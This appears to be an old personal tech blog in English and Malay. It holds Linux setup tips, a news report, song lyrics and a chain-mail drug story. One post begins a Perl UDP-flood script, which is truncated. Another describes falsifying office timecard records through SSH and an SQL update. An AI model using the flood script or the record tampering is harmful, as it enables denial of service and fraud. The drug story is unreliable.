Sunday, March 8, 2009
Wednesday, July 9, 2008
Open Source Quran
Monday, July 7, 2008
iwl3945 - 2.6.24-19 kernel
try this:
sudo apt-get install linux-ubuntu-modules-2.6.24-19-generic
and restart. gud luck
Sunday, July 6, 2008
Ganymede with PHP
(by assuming u've already successfully installed ur own ganymede)
1. Download the latest PDT 1.1 build. Unzip it.
2. Start eclipse update manager:
Help > Software Updates... > Available Software
Add Site... > add the Ganymede Update site (if not already listed): http://download.eclipse.org/releases/ganymede/
Add Site... > Local > add ur local unpacked folder: ~/eclipse/org.eclipse.php_feature-N20080623
Select the PDT Feature
Install...
3. restart ur eclipse when the installation finished.
enjoice php enabled ganymede !
set up java things in ubuntu
No need to argue, just use 'apt-get' things :
sudo apt-get update
for java 5
sudo apt-get install sun-java5-jre sun-java5-jdk
for java 6
sudo apt-get install sun-java6-jre sun-java6-jdk
verify ur installation
java -version
java version "1.6.0_06"
Java(TM) SE Runtime Environment (build 1.6.0_06-b02)
Java HotSpot(TM) Server VM (build 10.0-b22, mixed mode)
to list all ur java installed
sudo update-java-alternatives -l
java-1.5.0-sun 53 /usr/lib/jvm/java-1.5.0-sun
java-6-sun 63 /usr/lib/jvm/java-6-sun
to change ur default java
sudo update-alternatives --config java
SETTING JAVA ENV
edit this file
sudo vi /etc/environment
add line
# java 5
export JAVA_HOME=/usr/lib/jvm/java-1.5.0-sun
# java 6
#export JAVA_HOME=/usr/lib/jvm/java-6-sun
# tomcat 5
export CATALINA_HOME=/data/java/jakarta-tomcat-5.0.18
save ur file and logout
check ur env with
env | grep JAVA_HOME
env | grep CATALINA_HOME
Friday, July 4, 2008
Eclipse Europa crash with Firefox 3.0
No more handles (java.lang.UnsatisfiedLinkError: no swt-mozilla-gtk-3349 or
swt-mozilla-gtk in swt.library.path, java.library.path or the jar file)
at org.eclipse.swt.SWT.error(SWT.java:3589)
at org.eclipse.swt.SWT.error(SWT.java:3481)
at org.eclipse.swt.browser.Mozilla.create(Mozilla.java:323)
everytime i tried to open *.jsp using Amateras plugin.
SOLVED it by installing xulrunner:
sudo apt-get install xulrunner
it will takes 23MB from ur disk. Restart ur eclipse. SOLVED
Wednesday, July 2, 2008
Induction
Hurm, quite lazy to write a thousand words right now.
So i've changed it with pictures - that worth a thousand words too..hehehe
Enjoy my thousand words :D



pic #1 desc: some applicant was caught 'resting' during lecture time
pic #2 desc: new idea + invention was created to cure 'resting' phenomenas
pic #3 desc: yeay now we are safe. camouflage 'resting' :D

pic #4 desc: the good old /*days*/ school bus day - cave explorer
Sunday, June 8, 2008
UDP Flood perl script
Try follow this simple steps to make UDP Flood :
1. touch /tmp/udpflood.pl
2. chmod +x /tmp/udpflood.pl
3. copy & paste this to ur udpflood.pl script :
#!/usr/bin/perl
##############
# udp flood.
##############
use Socket;
use strict;
if ($#ARGV != 3) {
print "flood.pl
Fedora 9 Sulphur is out now
Fedora is a Linux-based operating system that showcases the latest in free and open source software. Fedora is always free for anyone to use, modify, and distribute. It is built by people across the globe who work together as a community: the Fedora Project. The Fedora Project is open and anyone is welcome to join.
The Fedora Project is out front for you, leading the advancement of free, open software and content.
get it Here
more info about F9 Here
Wednesday, May 14, 2008
Migration or Migraine-tion
Briefly, this is what i've successfully done :
1. Installed Ubuntu 8.04 LTS with 2.6.24-16-generic kernel ( ofcourse la..hehe :"> )
2. intel 3945 wireless LED
3. my trackpoint speed + sensitivity
4. trackpoint middle button scrolling
5. eclipse IDE
6. Apache 4, 5
7. Tomcat 4, 5
8. mysql
9. php
10. finger print reader
11. fn + keys functions
12. thinkpad hard disk active protection system (hdps)
13. tp_smpi
14. IE6 inside wine
15. windows xp inside qemu *
16. compiz-fushion *WOW
17. etc etc...
* my qemu installation process running without any problem until i realize that my intel T5500 processor is the only T5*** series that not support virtualization technology !!! WTF!!!!!!!!!!!!
no wonder when i boot my winxp inside qemu the process a little big big big BIG BIG PIG PIG slowwww...the word F again repeatedlyyyyy..huhuhuhuhu
my window$ installation process inside qemu (memory remains....)
Tuesday, April 15, 2008
mount win2k ntfs
In my case i'm using centos5.
On your linux box, as root :
create a mountpoint for your windows
mkdir /mnt/win2k
change owner/permission to your mountpoint
chmod 777 /mnt/win2k
mount your desired win2k folder to your mountpoint
mount -t cifs -o username=[win2k user], password=[win2k passwd], workgroup=[win2k workgroup] //[win2k ip or hostname] /mnt/win2k --verbose
Just change the [in bracket arg] with your own.
Hepi mounting :)
Monday, March 3, 2008
Linux tape backup with mt and tar command - howto
Magnetic tape is a non-volatile storage medium consisting of a magnetic coating on a thin plastic strip. Nearly all recording tape is of this type, whether used for video, audio storage or general purpose digital data storage using a computer.
Linux (and other Unixish system) use mt
The default tape drive under Linux is /dev/st0 (first SCSI tape device name). You can read more about tape drives naming convention used under Linux here. Following paragraph summaries command you need to use control tape drive for backup/restore purpose.
Rewind tape drive:
# mt -f /dev/st0 rewind
Backup directory /www and /home with tar command (z - compressed):# tar -czf /dev/st0 /www /home
Find out what block you are at with mt command:
# mt -f /dev/st0 tellDisplay list of files on tape drive:
# tar -tzf /dev/st0
Restore /www directory:# cd /
# mt -f /dev/st0 rewind
# tar -xzf /dev/st0 wwwUnload the tape:
# mt -f /dev/st0 offlineDisplay status information about the tape unit:
# mt -f /dev/st0 statusErase the tape:
# mt -f /dev/st0 eraseYou can go BACKWARD or FORWARD on tape with mt command itself:
(a) Go to end of data:
# mt -f /dev/nst0 eod
(b) Goto previous record:# mt -f /dev/nst0 bsfm 1
(c) Forward record:
# mt -f /dev/nst0 fsf 1* Replace /dev/st0 with your actual tape drive name.
Friday, December 28, 2007
The Cuppycake Song
Thursday, December 6, 2007
How They Hide Drugs
This story is extremely sad. A lady, with her husband, was planning a weekend trip across the Mexican border for a shopping spree. At the last minute their baby sitter canceled, so they had to bring along their two-year-old son with them. They had been across the border for about an hour when the baby got free and ran around the corner. The mother went chasing but the boy had disappeared. The mother found a police officer that told her to go to the gate and wait. Not really understanding the instructions, she did as she was told. About 45 minutes later, a man approached the border carrying the boy. The mother ran to him, grateful that he had been found. When the man realized it was the boy's mother, he dropped the boy and ran. The police were waiting and got him. The boy was dead. In the (less than) 45 minutes he was missing, he was cut open and all of his insides removed and his body cavity stuffed with COCAINE. The man was going to carry him across the border as if he were asleep. A two-year-old boy, dead, is carded as if he were a piece of trash for somebody's cocaine. If this story can get out and change one person's mind about what drugs mean to them, we are helping.
Tuesday, November 27, 2007
Sepakan Pemimpin
KOTA BHARU, 27 Nov (Hrkh)- Persidangan kali ketiga (Belanjawan) bagi tempoh penggal ke empat Dewan Undangan Negeri Kelantan mencatat sejarah terburuk apabila Dato' Nozula Mat Diah(BN-Paloh) bertindak menendang Mohd Zaki Ibrahim(PAS- Kelaboran) sewaktu sesi soal jawab dalam sidang DUN semalam.
Kejadian memalukan itu berjaya dirakamkan selama hampir dua minit dan aksi biadapnya boleh ditonton oleh semua pihak di laman web globalmediachannel.tv/ yang sentiasa menyiarkan perkembangan secara langsung Sidang Dun Kelantan.
Insiden bermula apabila Dato' Mohd Zain Ismail (BN-Bukit Tuku) tidak berpuas hati dengan jawapan yang diberikan oleh Pengerusi Jawatankuasa Perdagangan, Perindustrian dan Sumber Manusia , Zulkifli Mamat terhadap soalan yang dikemukakannya mengenai perkembangan projek Afta City Rantau Panjang bahawa projek tersebut telah dibatalkan.
"Permasalahan sekarang ialah kerajaan ingin memperbetulkan kenyataan bahawa ada exco yang hadir dalam perasmian tersebut. Kita ingin memperbetulkan kenyataan yang menyebabkan tuduhan daripada pihak YB (BN).
"Kita tidak mahu YB yang dipilih,kutip bawa cerita tepi jalan dan bawa naik ke dewan. Adakah hendak perbetulkan ini salah, "kata Zulkifli yang diikuti ketukan di meja oleh beberapa Adun.
Nozula tendang Zaki
Kata-kata Zulkifli itu menimbulkan kemarahan Nozula yang bangun dan menyifatkan jawapan Zulkifli itu sebagai 'tidak cerdik' dan menganggap pihak kerajaan negeri menuduh pihak pembangkang bodoh dan tidak mempedulikan teguran speaker supaya beliau duduk.
Keadaan menjadi semakin panas apabila Nozula mengambil serius kata-kata usikan daripada Zaki Ibrahim yang menimbulkan kemarahannya.
"Bagi peluang aku keccek lepas ni,"kata Nozula dengan nada yang keras.
Kata-kata Zaki supaya Adun Paloh itu meminta maaf kepada dewan dan meyatakan beliau bersikap kurang ajar menyebabkan Nozula bertindak diluar jangkaan.
"Mu yang kurang ajar," katanya sambil bertindak menyerang Zaki.
Tindakan Nozula itu cuba dihalang oleh beberapa Adun termasuk Saufi Deraman(BN-Galas) dan Abdul Halim Abdul Rahman(PAS- Chetok) yang berada bersebelahan Zaki.
Walaupun dihalang Nozula sempat melepaskan tendangan terhadap Zaki. Suasana dewan menjadi sedikit kecoh dan terpaksa ditenangkan oleh Speaker.
Sebelum ini, pada persidangan Dun 21 November, Nozula digantung sementara daripada menyertai persidangan pada hari tersebut yang mana Speaker menggunakan peraturan 51(3) bagi menggantung anggota Dewan Negeri yang enggan mematuhi arahan dan melakukan tindakan melampau-lampau semasa permesyuaratan berlangsung.
Sunday, November 25, 2007
PAPA, DON'T DO THIS !
Never teach ur baby gurl how to become minah rempit.
What a poor girl and a careless man
Wednesday, November 21, 2007
Kad Tumbuk
Kad tumbuk aku dah jadi kaler kuning dah. Aiyakkk.
Tp kat sini aku nk kasik skill yg aku selalu guna kalo aku dtg lambat hehe
1. Pastikan masa nak naik lif tu x terserempak ngn SUB or TKSU or MENTERI ker hehe
2. Masuk jer pintu opis terus g ngadap mesin tumbuk
3. Jgn terus tumbuk, tp..
4. tekan butang ENT
5. tekan kod 04 (kenderaan rosak/kesesakan lalulintas)
6. skang dah bleh tumbuk
7. masuk bilik opis dengan senyuman gembira
8. tunggu jer bos approve alasan 04 aku tuh hehe
* cara lain yg lebih kejam
ssh 192.168.100.***
login: admin/***
sql: update table *** set **** = 0825 where empno=*** and date = '20/11/2007';
:)
Tuesday, November 20, 2007
songza listen now !
Meh dengar music online. Actually all the resources utk music yg dicari adalah drpd youtube. Enjoy here
Monday, November 19, 2007
Munajat Cinta
tak ada yang, menemani,
seperti malam-malam,
yang sudah, sudah
Hati ini, selalu sepi,
tak ada yang, menghiasi,
seperti cinta ini,
yang s’lalu, pupus
[Chorus:]
Tuhan kirimkanlah aku,
kekasih yang, baik hati,
yang mencintai aku,
apa adanya
Mawar ini, semakin layu,
tak ada yang, memiliki,
seperti, aku ini,
semakin, pupus
Tuhan kirimkanlah aku,
kekasih yang, baik hati,
yang mencintai aku,
apa adanya
[Interlude]
[Chorus] (x2)
